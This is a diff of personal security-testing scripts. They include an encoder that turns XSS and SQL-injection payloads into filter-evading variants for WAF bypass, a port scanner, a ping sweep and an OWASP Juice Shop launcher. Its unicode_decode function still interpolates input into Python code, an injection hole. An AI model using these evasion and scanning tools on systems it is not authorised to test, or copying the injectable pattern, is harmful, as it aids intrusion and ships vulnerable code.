# Value passed via argv, not interpolated into the Python source
# (injection-safe; the original broke on quotes).
html_decode() {
    local input
    input=$(get_input "$@")
    python3 -c 'import sys, html; print(html.unescape(sys.argv[1]))' "$input"
}
|
||||||
|
|
||||||
|
# Hex operations
|
||||||
|
# Hex-encode the input as one continuous lowercase hex string.
# Uses POSIX 'od' instead of 'xxd' (xxd ships with vim and may be absent).
hex_encode() {
    local input
    input=$(get_input "$@")
    printf '%s' "$input" | od -An -v -tx1 | tr -d ' \n'
}
|
||||||
|
|
||||||
|
# Hex-decode the input back to raw bytes.
# Decodes via python3 (already a hard dependency of this script) instead
# of 'xxd -r' so the tool works where xxd/vim isn't installed.
# bytes.fromhex tolerates whitespace between byte pairs.
hex_decode() {
    local input
    input=$(get_input "$@")
    printf '%s' "$input" | python3 -c 'import sys; sys.stdout.buffer.write(bytes.fromhex(sys.stdin.read().strip()))'
}
|
||||||
|
|
||||||
|
# Unicode operations
|
||||||
|
# Encode every character of the input as a \uXXXX escape sequence.
# Value passed via argv instead of being spliced into a Python heredoc,
# which broke on quotes/backslashes and was code injection.
unicode_encode() {
    local input
    input=$(get_input "$@")
    python3 -c 'import sys; print("".join(f"\\u{ord(c):04x}" for c in sys.argv[1]))' "$input"
}
|
||||||
|
|
||||||
|
unicode_decode() {
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
python3 -c "print('$input'.encode().decode('unicode_escape'))"
|
||||||
|
}
|
||||||
|
|
||||||
|
# JWT decode (header + payload; signature is NOT verified).
# FIX: JWT segments are base64url-encoded (RFC 7515: '-'/'_' alphabet, no
# '=' padding); plain `base64 -d` rejects most real tokens. Translate the
# alphabet and re-pad each segment before decoding.
jwt_decode() {
    local token
    token=$(get_input "$@")

    # Decode one base64url segment.
    _jwt_b64url_decode() {
        local seg=${1//-/+}
        seg=${seg//_/\/}
        case $(( ${#seg} % 4 )) in
            2) seg+='==' ;;
            3) seg+='=' ;;
        esac
        printf '%s' "$seg" | base64 -d 2>/dev/null || printf '%s' "$seg" | base64 -D
    }

    # Split JWT into header.payload.signature
    IFS='.' read -ra PARTS <<< "$token"

    if [[ ${#PARTS[@]} -ne 3 ]]; then
        echo "${RED}Error: Invalid JWT format${NC}" >&2
        return 1
    fi

    echo -e "${BOLD}${CYAN}=== JWT Header ===${NC}"
    _jwt_b64url_decode "${PARTS[0]}" | python3 -m json.tool

    echo -e "\n${BOLD}${CYAN}=== JWT Payload ===${NC}"
    _jwt_b64url_decode "${PARTS[1]}" | python3 -m json.tool

    echo -e "\n${BOLD}${YELLOW}Note: Signature not verified${NC}"
}
|
||||||
|
|
||||||
|
# Hash generation: map the algorithm name to its coreutils digest tool,
# then hash the input and print only the digest column.
generate_hash() {
    local algo=$1
    shift
    local data
    data=$(get_input "$@")

    local tool
    case "$algo" in
        md5)    tool=md5sum ;;
        sha1)   tool=sha1sum ;;
        sha256) tool=sha256sum ;;
        sha512) tool=sha512sum ;;
        *)
            echo "${RED}Error: Unknown hash algorithm: $algo${NC}" >&2
            echo "Available: md5, sha1, sha256, sha512" >&2
            return 1
            ;;
    esac

    echo -n "$data" | "$tool" | awk '{print $1}'
}
|
||||||
|
|
||||||
|
# XSS payload variants: print the payload under several encodings commonly
# used to slip past naive WAF / input filters.
xss_variants() {
    local payload
    payload=$(get_input "$@")

    echo -e "${BOLD}${CYAN}=== XSS Payload Variants ===${NC}\n"

    echo -e "${YELLOW}[Original]${NC}"
    echo "$payload"

    echo -e "\n${YELLOW}[URL Encoded]${NC}"
    url_encode "$payload"

    echo -e "\n${YELLOW}[Double URL Encoded]${NC}"
    url_encode "$(url_encode "$payload")"

    echo -e "\n${YELLOW}[HTML Entity Encoded]${NC}"
    html_encode "$payload"

    echo -e "\n${YELLOW}[Hex Encoded]${NC}"
    hex_encode "$payload"

    echo -e "\n${YELLOW}[Base64]${NC}"
    base64_encode "$payload"

    echo -e "\n${YELLOW}[Unicode Escaped]${NC}"
    unicode_encode "$payload"

    echo -e "\n${BOLD}${GREEN}Tip: Use these to bypass WAF filters${NC}"
}
|
||||||
|
|
||||||
|
# SQL injection variants: print the payload under encodings/case tricks
# commonly used to evade filters.
sqli_variants() {
    local input
    input=$(get_input "$@")

    echo -e "${BOLD}${CYAN}=== SQL Injection Variants ===${NC}\n"

    echo -e "${YELLOW}[Original]${NC}"
    echo "$input"

    echo -e "\n${YELLOW}[URL Encoded]${NC}"
    url_encode "$input"

    echo -e "\n${YELLOW}[Double URL Encoded]${NC}"
    url_encode "$(url_encode "$input")"

    echo -e "\n${YELLOW}[Uppercase]${NC}"
    echo "$input" | tr '[:lower:]' '[:upper:]'

    echo -e "\n${YELLOW}[Mixed Case]${NC}"
    # SECURITY FIX: the payload was interpolated into an unquoted Python
    # heredoc and could execute arbitrary code; pass it via argv instead.
    python3 -c 'import random, sys
text = sys.argv[1]
print("".join(c.upper() if random.random() > 0.5 else c.lower() for c in text))' "$input"

    echo -e "\n${YELLOW}[With Comments]${NC}"
    echo "$input" | sed 's/ /\/**\/ /g'

    echo -e "\n${BOLD}${GREEN}Tip: Combine with timing to test blind SQLi${NC}"
}
|
||||||
|
|
||||||
|
# Main logic: dispatch the first argument as an operation, pass the rest
# through as input to the matching helper.
if [[ $# -eq 0 ]]; then
    show_help
    exit 0
fi

operation=$1
shift

case "$operation" in
    -h|--help|help) show_help ;;
    base64|b64)     base64_encode "$@" ;;
    base64d|b64d)   base64_decode "$@" ;;
    url)            url_encode "$@" ;;
    urld)           url_decode "$@" ;;
    html)           html_encode "$@" ;;
    htmld)          html_decode "$@" ;;
    hex)            hex_encode "$@" ;;
    hexd)           hex_decode "$@" ;;
    unicode|uni)    unicode_encode "$@" ;;
    unicoded|unid)  unicode_decode "$@" ;;
    jwt)            jwt_decode "$@" ;;
    hash)
        # hash needs an explicit algorithm before the input
        if [[ $# -eq 0 ]]; then
            echo "${RED}Error: Hash algorithm required${NC}" >&2
            echo "Usage: encode hash <md5|sha1|sha256|sha512> <input>" >&2
            exit 1
        fi
        generate_hash "$@"
        ;;
    xss)            xss_variants "$@" ;;
    sqli|sql)       sqli_variants "$@" ;;
    *)
        echo "${RED}Error: Unknown operation: $operation${NC}" >&2
        echo "Run 'encode --help' for usage information" >&2
        exit 1
        ;;
esac
|
||||||
93
scripts/fast-portscan.py
Executable file
93
scripts/fast-portscan.py
Executable file
|
|
@ -0,0 +1,93 @@
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import socket
|
||||||
|
import common_ports
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import re
|
||||||
|
from concurrent.futures import ThreadPoolExecutor
|
||||||
|
|
||||||
|
|
||||||
|
def scan_port(ip_addr, port):
    """Attempt a TCP connect to (ip_addr, port) with a 1-second timeout.

    Returns the port number if the connection succeeds, else None.
    """
    try:
        # Context manager guarantees the socket is closed on every path
        # (the original leaked the fd when connect_ex raised).
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(1)
            if s.connect_ex((ip_addr, port)) == 0:
                return port
    except OSError:
        # FIX: was a bare `except`, which also swallowed KeyboardInterrupt
        # and SystemExit; all socket errors are subclasses of OSError.
        return None
    return None
|
||||||
|
|
||||||
|
|
||||||
|
def get_open_ports(target, port_range, verbose=False):
    """Scan `target` over the inclusive port range [start, end].

    Returns a list of open ports, or (verbose=True) a formatted report
    string. Returns an error string when the target cannot be resolved.
    """
    # Resolve the target; distinguish a malformed IP from a bad hostname.
    try:
        ip_addr = socket.gethostbyname(target)
    except socket.gaierror:
        looks_like_ip = re.match(r'^\d{1,3}(\.\d{1,3}){3}$', target)
        return "Error: Invalid IP address" if looks_like_ip else "Error: Invalid hostname"

    start, end = port_range
    with ThreadPoolExecutor(max_workers=100) as pool:
        results = pool.map(lambda p: scan_port(ip_addr, p), range(start, end + 1))
        open_ports = [p for p in results if p]

    if not verbose:
        return open_ports

    # Verbose report: prefer the reverse-DNS name, fall back to the target.
    try:
        hostname = socket.gethostbyaddr(ip_addr)[0]
    except socket.herror:
        hostname = target

    report = f"Open ports for {hostname} ({ip_addr})\nPORT SERVICE\n"
    try:
        import common_ports
        lookup = common_ports.ports_and_services
        for p in open_ports:
            report += f"{p:<9}{lookup.get(p, 'unknown')}\n"
    except ImportError:
        # common_ports is optional — degrade to 'unknown' service names.
        for p in open_ports:
            report += f"{p:<9}unknown\n"
    return report.strip()
|
||||||
|
|
||||||
|
|
||||||
|
# print(get_open_ports("scanme.nmap.org", [20, 80], verbose=True))

def main():
    """CLI entry point: scan one target, or every line of a target file."""
    if len(sys.argv) < 2:
        print("Usage: python3 portscan.py <ip_or_file> [start_port] [end_port] [--verbose]")
        return

    input_arg = sys.argv[1]
    # Defaults mirror the classic "interesting" range: 20-1024.
    start_port = int(sys.argv[2]) if len(sys.argv) > 2 else 20
    end_port = int(sys.argv[3]) if len(sys.argv) > 3 else 1024
    verbose = "--verbose" in sys.argv

    # A file argument means one target per non-empty line.
    if os.path.isfile(input_arg):
        with open(input_arg) as f:
            targets = [line.strip() for line in f if line.strip()]
    else:
        targets = [input_arg]

    for target in targets:
        print(get_open_ports(target, [start_port, end_port], verbose))
        print("-" * 40)


if __name__ == "__main__":
    main()
|
||||||
53
scripts/fast-psweep.py
Executable file
53
scripts/fast-psweep.py
Executable file
|
|
@ -0,0 +1,53 @@
|
||||||
|
import sys
|
||||||
|
import subprocess
|
||||||
|
import time
|
||||||
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||||
|
|
||||||
|
|
||||||
|
def ping_host(ip):
    """Ping `ip` once with a 1-second timeout.

    Returns the ip string if the host responded, else None.
    """
    # FIX: also silence stderr so unreachable-network / name errors from
    # ping don't clutter the sweep output (stdout was already discarded).
    result = subprocess.run(
        ["ping", "-c", "1", "-W", "1", ip],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    return ip if result.returncode == 0 else None
|
||||||
|
|
||||||
|
|
||||||
|
def ping_sweep(network_prefix, max_threads=100):
    """Ping every host in <prefix>.1-255 concurrently.

    Prints responders as they come in and returns the list of live hosts.
    """
    live_hosts = []
    with ThreadPoolExecutor(max_workers=max_threads) as pool:
        pending = [
            pool.submit(ping_host, f"{network_prefix}.{i}")
            for i in range(1, 256)
        ]
        for done in as_completed(pending):
            host = done.result()
            if host:
                print(f"{host} is up.")
                live_hosts.append(host)
    return live_hosts
|
||||||
|
|
||||||
|
|
||||||
|
# ---- Entry Point ----
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 pingsweep.py <network_prefix>")
        print("Example: python3 pingsweep.py 192.168.1")
        sys.exit(1)

    # Assume prefix like "192.168.1"
    prefix = sys.argv[1]
    timestamp = time.strftime('%Y%m%d-%H%M%S')
    filename = f'{prefix}.0_24_{timestamp}.txt'

    print(f"Scanning {prefix}.1 to {prefix}.255 ...")
    hosts = ping_sweep(prefix)

    print("\nLive hosts:")
    for host in hosts:
        print(host)

    with open(filename, 'w') as f:
        for host in hosts:
            f.write(host + '\n')

    # FIX: the final message printed a literal placeholder instead of the
    # output path; interpolate the actual filename.
    print(f'Saved live hosts to {filename}')
|
||||||
14
scripts/flameshot-bb
Executable file
14
scripts/flameshot-bb
Executable file
|
|
@ -0,0 +1,14 @@
|
||||||
|
#!/bin/bash
# Take a screenshot with Flameshot and frame it in a bug-bounty style
# border (crimson/white/grey + drop shadow) under ~/Pictures/Screenshots.

# FIX: use mktemp instead of a predictable second-granularity /tmp name
# (avoids collisions and symlink tricks in the shared /tmp directory).
TEMP=$(mktemp --suffix=.png /tmp/flameshot_XXXXXX)

flameshot gui -p "$TEMP"

# FIX: test -s (non-empty), not -f — mktemp pre-creates the file, and a
# cancelled screenshot would otherwise feed an empty image to convert.
if [[ -s "$TEMP" ]]; then
    # FIX: ensure the destination directory exists; convert fails otherwise
    # and the screenshot is then lost to the rm below.
    mkdir -p ~/Pictures/Screenshots
    convert "$TEMP" \
        -bordercolor '#DC143C' -border 3 \
        -bordercolor white -border 12 \
        -bordercolor '#333333' -border 1 \
        \( +clone -background black -shadow 80x5+8+8 \) \
        +swap -background white -layers merge +repage \
        ~/Pictures/Screenshots/bb_$(date +%Y%m%d_%H%M%S).png
fi
rm -f "$TEMP"
|
||||||
28
scripts/flameshot-bb-edit
Executable file
28
scripts/flameshot-bb-edit
Executable file
|
|
@ -0,0 +1,28 @@
|
||||||
|
#!/bin/bash
# Bug Bounty Documentation Screenshot: Annotate -> Add border -> Save
# Usage: Bound to Shift+Super+D

# FIX: use mktemp instead of a predictable second-granularity /tmp name.
TEMP=$(mktemp --suffix=.png /tmp/flameshot_XXXXXX)

# This will open Flameshot GUI with all annotation tools available
flameshot gui -p "$TEMP"

# FIX: test -s (non-empty), not -f — mktemp pre-creates the file, and a
# cancelled screenshot would otherwise feed an empty image to convert.
if [[ -s "$TEMP" ]]; then
    # FIX: make sure the destination directory exists before convert writes
    mkdir -p ~/Pictures/Screenshots

    # Add professional border
    convert "$TEMP" \
        -bordercolor '#DC143C' -border 3 \
        -bordercolor white -border 12 \
        -bordercolor '#333333' -border 1 \
        \( +clone -background black -shadow 80x5+8+8 \) \
        +swap -background white -layers merge +repage \
        ~/Pictures/Screenshots/bb_doc_$(date +%Y%m%d_%H%M%S).png

    # Copy relative path to clipboard and notify (best-effort)
    LATEST=$(ls -t ~/Pictures/Screenshots/bb_doc_*.png 2>/dev/null | head -1)
    if [[ -n "$LATEST" ]]; then
        echo "Screenshots/$(basename "$LATEST")" | xclip -selection clipboard 2>/dev/null || true
        notify-send "Bug Bounty Screenshot" "Saved: $(basename "$LATEST")" 2>/dev/null || true
    fi
fi
rm -f "$TEMP"
|
||||||
75
scripts/httpstatus
Executable file
75
scripts/httpstatus
Executable file
|
|
@ -0,0 +1,75 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# httpstatus - HTTP status code reference lookup.
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
#
#   httpstatus          show the full table
#   httpstatus 404      search by code
#   httpstatus server   search by phrase (case-insensitive)

statuses="100 Continue
101 Switching Protocols
102 Processing
200 OK
201 Created
202 Accepted
203 Non-Authoritative Information
204 No Content
205 Reset Content
206 Partial Content
207 Multi-Status
208 Already Reported
300 Multiple Choices
301 Moved Permanently
302 Found
303 See Other
304 Not Modified
305 Use Proxy
307 Temporary Redirect
400 Bad Request
401 Unauthorized
402 Payment Required
403 Forbidden
404 Not Found
405 Method Not Allowed
406 Not Acceptable
407 Proxy Authentication Required
408 Request Timeout
409 Conflict
410 Gone
411 Length Required
412 Precondition Failed
413 Request Entity Too Large
414 Request-URI Too Large
415 Unsupported Media Type
416 Request Range Not Satisfiable
417 Expectation Failed
418 I'm a teapot
420 Blaze it
422 Unprocessable Entity
423 Locked
424 Failed Dependency
425 No code
426 Upgrade Required
428 Precondition Required
429 Too Many Requests
431 Request Header Fields Too Large
449 Retry with
500 Internal Server Error
501 Not Implemented
502 Bad Gateway
503 Service Unavailable
504 Gateway Timeout
505 HTTP Version Not Supported
506 Variant Also Negotiates
507 Insufficient Storage
509 Bandwidth Limit Exceeded
510 Not Extended
511 Network Authentication Required"

# No arguments: dump the whole table; otherwise grep it case-insensitively.
if (( $# )); then
    echo "$statuses" | grep -i --color=never "$@"
else
    echo "$statuses"
fi
|
||||||
219
scripts/jj
Executable file
219
scripts/jj
Executable file
|
|
@ -0,0 +1,219 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# jj - JSON formatting and querying tool (upgrade from alias)
#
#   jj                     Format clipboard JSON
#   jj '.users[0].name'    jq query on clipboard
#   jj -v                  Validate JSON
#   jj -f file.json        Format file in place
#   jj -c                  Compact JSON (remove whitespace)
#   cat file.json | jj     Format from stdin

VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Print usage. %b makes printf interpret the embedded \033 color escapes,
# one output line per argument.
show_help() {
    printf '%b\n' \
        "\033[1mjj\033[0m - JSON Formatting & Querying Tool v${VERSION}" \
        "" \
        "\033[1mUSAGE:\033[0m" \
        "  jj [OPTIONS] [JQ_QUERY]" \
        "" \
        "\033[1mOPTIONS:\033[0m" \
        "  \033[0;36m-v, --validate\033[0m  Validate JSON only (no output)" \
        "  \033[0;36m-f, --file\033[0m      Format file in place" \
        "  \033[0;36m-c, --compact\033[0m   Compact JSON (remove whitespace)" \
        "  \033[0;36m-i, --stdin\033[0m     Read from stdin instead of clipboard" \
        "  \033[0;36m-o, --output\033[0m    Write to clipboard (default: stdout)" \
        "  \033[0;36m-h, --help\033[0m      Show this help message" \
        "" \
        "\033[1mEXAMPLES:\033[0m" \
        "  jj                         # Format clipboard JSON" \
        "  jj '.users[0].name'        # Query clipboard with jq" \
        "  jj -v                      # Validate clipboard JSON" \
        "  jj -f data.json            # Format file in place" \
        "  jj -c                      # Compact clipboard JSON" \
        "  cat file.json | jj         # Format from stdin" \
        "  curl api.com | jj '.data'  # Query API response" \
        "" \
        "\033[1mNOTE:\033[0m" \
        "  Requires jq to be installed for querying"
}
|
||||||
|
|
||||||
|
# Clipboard helpers: prefer xsel, fall back to xclip, else fail loudly.
clip_get() {
    if command -v xsel &>/dev/null; then
        xsel --output --clipboard
        return
    fi
    if command -v xclip &>/dev/null; then
        xclip -selection clipboard -o
        return
    fi
    echo "Error: No clipboard tool found" >&2
    return 1
}

clip_set() {
    if command -v xsel &>/dev/null; then
        xsel --input --clipboard
        return
    fi
    if command -v xclip &>/dev/null; then
        xclip -selection clipboard
        return
    fi
    echo "Error: No clipboard tool found" >&2
    return 1
}
|
||||||
|
|
||||||
|
# Pick the input source: stdin when explicitly requested (-i) or when
# stdin is a pipe/redirect; otherwise read the clipboard.
get_input() {
    if [[ "${use_stdin}" == "true" || ! -t 0 ]]; then
        cat
    else
        clip_get
    fi
}
|
||||||
|
|
||||||
|
# Validate JSON: print a check/cross and propagate jq's verdict.
validate_json() {
    local doc=$1
    if jq empty <<<"$doc" 2>/dev/null; then
        echo -e "\033[0;32m✓\033[0m Valid JSON"
        return 0
    fi
    echo -e "\033[0;31m✗\033[0m Invalid JSON:" >&2
    jq empty <<<"$doc" 2>&1 | sed 's/^/  /' >&2
    return 1
}

# Pretty-print JSON.
format_json() {
    jq . <<<"$1"
}

# Minify JSON (single line, no whitespace).
compact_json() {
    jq -c . <<<"$1"
}

# Apply a jq filter expression to the document.
query_json() {
    jq "$2" <<<"$1"
}
|
||||||
|
|
||||||
|
# ---------- Argument parsing ----------
mode="format"
use_stdin=false
to_clipboard=false
file_path=""
jq_query=""

while [[ $# -gt 0 ]]; do
    case $1 in
        -v|--validate)
            mode="validate"
            shift
            ;;
        -f|--file)
            # FIX: under `set -u`, `jj -f` with no filename used to die with
            # a cryptic "unbound variable" error; report it properly.
            if [[ $# -lt 2 ]]; then
                echo -e "\033[0;31mError:\033[0m -f/--file requires a filename" >&2
                exit 1
            fi
            mode="file"
            file_path="$2"
            shift 2
            ;;
        -c|--compact)
            mode="compact"
            shift
            ;;
        -i|--stdin)
            use_stdin=true
            shift
            ;;
        -o|--output)
            to_clipboard=true
            shift
            ;;
        -h|--help)
            show_help
            exit 0
            ;;
        *)
            # Anything unrecognized is treated as a jq query
            jq_query="$1"
            mode="query"
            shift
            ;;
    esac
done

# jq is required for every mode
if ! command -v jq &>/dev/null; then
    echo -e "\033[0;31mError:\033[0m jq is not installed" >&2
    echo "Install it with: sudo apt install jq" >&2
    exit 1
fi

# ---------- Main logic ----------
case "$mode" in
    validate)
        input=$(get_input)
        validate_json "$input"
        ;;

    file)
        if [[ ! -f "$file_path" ]]; then
            echo -e "\033[0;31mError:\033[0m File not found: $file_path" >&2
            exit 1
        fi

        # Validate before rewriting so we never clobber the file with garbage
        if ! jq empty "$file_path" 2>/dev/null; then
            echo -e "\033[0;31mError:\033[0m Invalid JSON in file" >&2
            jq empty "$file_path" 2>&1 | sed 's/^/  /' >&2
            exit 1
        fi

        # Format atomically via a temp file
        temp_file=$(mktemp)
        jq . "$file_path" > "$temp_file"
        mv "$temp_file" "$file_path"
        echo -e "\033[0;32m✓\033[0m Formatted: $file_path"
        ;;

    compact)
        input=$(get_input)
        output=$(compact_json "$input")
        if [[ "$to_clipboard" == "true" ]]; then
            echo -n "$output" | clip_set
            echo -e "\033[0;32m✓\033[0m Copied compacted JSON to clipboard"
        else
            echo "$output"
        fi
        ;;

    query)
        input=$(get_input)
        output=$(query_json "$input" "$jq_query")
        if [[ "$to_clipboard" == "true" ]]; then
            echo -n "$output" | clip_set
            echo -e "\033[0;32m✓\033[0m Copied query result to clipboard"
        else
            echo "$output"
        fi
        ;;

    format)
        input=$(get_input)
        output=$(format_json "$input")
        if [[ "$to_clipboard" == "true" ]]; then
            echo -n "$output" | clip_set
            echo -e "\033[0;32m✓\033[0m Copied formatted JSON to clipboard"
        else
            echo "$output"
        fi
        ;;
esac
|
||||||
172
scripts/jshop
Executable file
172
scripts/jshop
Executable file
|
|
@ -0,0 +1,172 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# jshop - OWASP Juice Shop launcher
# Usage: jshop start|stop|status|logs

VERSION="1.0.0"

# ANSI color constants
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly CYAN='\033[0;36m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'

CONTAINER_NAME="juice-shop"
IMAGE="bkimminich/juice-shop"
DEFAULT_PORT="3000"
|
||||||
|
|
||||||
|
# Find the first free TCP port at or above $1 (default 3000), printing it.
# FIX: the in-use check shelled out to `sudo netstat`, which can block on an
# interactive password prompt and fails where netstat isn't installed; use
# unprivileged `ss` instead (listening sockets are world-visible).
find_available_port() {
    local port="${1:-3000}"
    while lsof -Pi :"$port" -sTCP:LISTEN -t >/dev/null 2>&1 \
          || ss -tuln 2>/dev/null | grep -q ":$port "; do
        echo -e "${YELLOW}⚠${NC} Port $port in use, trying next..." >&2
        port=$((port + 1))
    done
    echo "$port"
}
|
||||||
|
|
||||||
|
# Print usage. %b expands the \033 escapes stored in the color variables,
# one output line per argument.
show_help() {
    printf '%b\n' \
        "${BOLD}jshop${NC} - OWASP Juice Shop Launcher v${VERSION}" \
        "" \
        "${BOLD}USAGE:${NC}" \
        "  jshop <command>" \
        "" \
        "${BOLD}COMMANDS:${NC}" \
        "  ${CYAN}start${NC}    Start Juice Shop" \
        "  ${CYAN}stop${NC}     Stop Juice Shop" \
        "  ${CYAN}restart${NC}  Restart Juice Shop" \
        "  ${CYAN}status${NC}   Check if running" \
        "  ${CYAN}logs${NC}     Show container logs" \
        "  ${CYAN}shell${NC}    Open shell in container" \
        "" \
        "${BOLD}EXAMPLES:${NC}" \
        "  jshop start   # Launch Juice Shop" \
        "  jshop stop    # Stop Juice Shop" \
        "  jshop logs    # View logs" \
        "" \
        "${BOLD}ACCESS:${NC}" \
        "  URL: ${BOLD}http://localhost:\$PORT${NC} (auto-detects available port)" \
        "" \
        "${BOLD}ABOUT:${NC}" \
        "  OWASP Juice Shop - Intentionally insecure web application" \
        "  Perfect for testing: XSS, SQLi, auth bypass, IDOR, etc." \
        "  Docs: https://pwning.owasp-juice.shop/"
}
|
||||||
|
|
||||||
|
# Abort the script unless the docker CLI is on PATH.
check_docker() {
    if ! command -v docker &>/dev/null; then
        echo -e "${RED}Error:${NC} Docker not installed"
        exit 1
    fi
}
|
||||||
|
|
||||||
|
# Start (or resume) the Juice Shop container and report the access URL.
start_jshop() {
    # Resolve a free host port only when actually starting.
    local port
    port=$(find_available_port "$DEFAULT_PORT")

    if docker ps -a --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        # Container exists — it may already be running.
        if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
            echo -e "${YELLOW}⚠${NC} Juice Shop already running"
            local current_port
            current_port=$(docker port "$CONTAINER_NAME" 3000 | cut -d: -f2)
            echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${current_port}${NC}"
            return 0
        fi
        echo -e "${CYAN}[*]${NC} Starting existing container..."
        docker start "$CONTAINER_NAME"
    else
        echo -e "${CYAN}[*]${NC} Pulling ${IMAGE}..."
        docker pull "$IMAGE"
        echo -e "${CYAN}[*]${NC} Starting Juice Shop..."
        docker run -d --name "$CONTAINER_NAME" -p "${port}:3000" "$IMAGE"
    fi

    echo -e "${GREEN}✓${NC} Juice Shop started"
    if [[ "$port" != "$DEFAULT_PORT" ]]; then
        echo -e "${YELLOW}⚠${NC} Using port ${port} (default ${DEFAULT_PORT} was in use)"
    fi
    echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${port}${NC}"
}
|
||||||
|
|
||||||
|
# Stop the container if it is running; otherwise just say so.
stop_jshop() {
    if ! docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${YELLOW}⚠${NC} Juice Shop not running"
        return
    fi
    echo -e "${CYAN}[*]${NC} Stopping Juice Shop..."
    docker stop "$CONTAINER_NAME"
    echo -e "${GREEN}✓${NC} Juice Shop stopped"
}

# Stop, give Docker a moment to release the name/port, then start again.
restart_jshop() {
    stop_jshop
    sleep 2
    start_jshop
}
|
||||||
|
|
||||||
|
# True when the juice-shop container is currently running.
_jshop_running() {
    docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"
}

# Report running/stopped state, the mapped port, and the docker ps row.
show_status() {
    if _jshop_running; then
        echo -e "${GREEN}●${NC} Juice Shop is ${GREEN}running${NC}"
        CURRENT_PORT=$(docker port "$CONTAINER_NAME" 3000 2>/dev/null | cut -d: -f2)
        echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
        docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|${CONTAINER_NAME})"
    else
        echo -e "${RED}●${NC} Juice Shop is ${RED}stopped${NC}"
    fi
}

# Follow the container logs (requires a running container).
show_logs() {
    if ! _jshop_running; then
        echo -e "${RED}Error:${NC} Juice Shop not running"
        exit 1
    fi
    docker logs -f "$CONTAINER_NAME"
}

# Open an interactive shell inside the running container.
open_shell() {
    if ! _jshop_running; then
        echo -e "${RED}Error:${NC} Juice Shop not running"
        exit 1
    fi
    docker exec -it "$CONTAINER_NAME" /bin/sh
}
|
||||||
|
|
||||||
|
# ---- Main ----
check_docker

if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
    show_help
    exit 0
fi

case "$1" in
    start|up)      start_jshop ;;
    stop|down)     stop_jshop ;;
    restart)       restart_jshop ;;
    status)        show_status ;;
    logs)          show_logs ;;
    shell|sh|bash) open_shell ;;
    *)
        echo -e "${RED}Error:${NC} Unknown command: $1"
        echo "Run 'jshop --help' for usage"
        exit 1
        ;;
esac
|
||||||
52
scripts/md_update.sh
Executable file
52
scripts/md_update.sh
Executable file
|
|
@ -0,0 +1,52 @@
|
||||||
|
#!/bin/bash
# NOTE(review): -v (echo script lines) looks accidental but is kept for
# backward-compatible output; consider `set -euo pipefail` instead.
set -evo pipefail

# md_update.sh - Update the Monero CLI binaries in /usr/local/bin and
# restart monerod.
# NOTE(review): hashes.txt must already exist in the CWD (fetched and
# verified separately) — this script only runs `shasum -c` against it.

echo "[*] Monero Updating"
echo "[-] Removing old monero binaries..."
rm -rf monero-*-linux-*

echo -e "[*] Checking architecture..."

case "$(arch)" in
    x86_64)
        # Download latest 64-bit binaries
        echo "[*] Download latest Linux binaries..."
        wget -q --content-disposition https://downloads.getmonero.org/cli/linux64
        ;;
    aarch64|arm64|armv8)
        # FIX: "aarm64" was a typo — `arch`/`uname -m` report "aarch64"
        # (Linux) or "arm64" (macOS/BSD), never "aarm64".
        echo "[*] Download latest Linux Arm8 binaries..."
        wget -q --content-disposition https://downloads.getmonero.org/cli/linuxarm8
        ;;
    armv7l)
        # FIX: was "armv71" — the real machine string is "armv7l"
        # (lower-case L), so this branch could never match.
        echo "[*] Download latest Linux Arm7 binaries..."
        wget -q --content-disposition https://downloads.getmonero.org/cli/linuxarm7
        ;;
    *)
        echo -e "\e[31m[!] ERROR: Architecture not found. Please see https://www.getmonero.org/downloads/ to download manually.\e[0m"
        exit 1
        ;;
esac

# Verify shasum of downloaded binaries
echo "[*] Verifying hashes of downloaded binaries..."
if shasum -a 256 -c hashes.txt -s --ignore-missing
then
    echo
    echo "[~] Success: The downloaded binaries verified properly!"
else
    echo
    echo -e "\e[31m[!] DANGER: The download binaries have been tampered with or corrupted.\e[0m"
    rm -rf monero-linux-*.tar.bz2
    exit 1
fi

echo "[~] Extracting new monero binaries..."
tar xvf monero-linux-*.tar.bz2
rm monero-linux-*.tar.bz2

echo "[-] Stopping monerod..."
sudo systemctl stop monerod

echo "[~] Copying binaries to /usr/local/bin/"
sudo cp -r monero-*-linux-*/* /usr/local/bin/
sudo chown -R monero:monero /usr/local/bin/monero*

echo "[+] Starting monerod..."
sudo systemctl start monerod
||||||
24
scripts/mksh
Executable file
24
scripts/mksh
Executable file
|
|
@ -0,0 +1,24 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# mksh - create an executable bash script from a strict-mode template and
# open it in $EDITOR.
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/

if [[ $# -ne 1 ]]; then
    echo 'mksh takes one argument' >&2
    exit 1
fi
if [[ -e "$1" ]]; then
    echo "$1 already exists" >&2
    exit 1
fi

# Quoted delimiter: the template is written literally, nothing expands.
cat > "$1" << 'EOF'
#!/usr/bin/env bash
set -euo pipefail

EOF

chmod +x "$1"

"${EDITOR:-vim}" "$1"
|
||||||
124
scripts/murder
Executable file
124
scripts/murder
Executable file
|
|
@ -0,0 +1,124 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

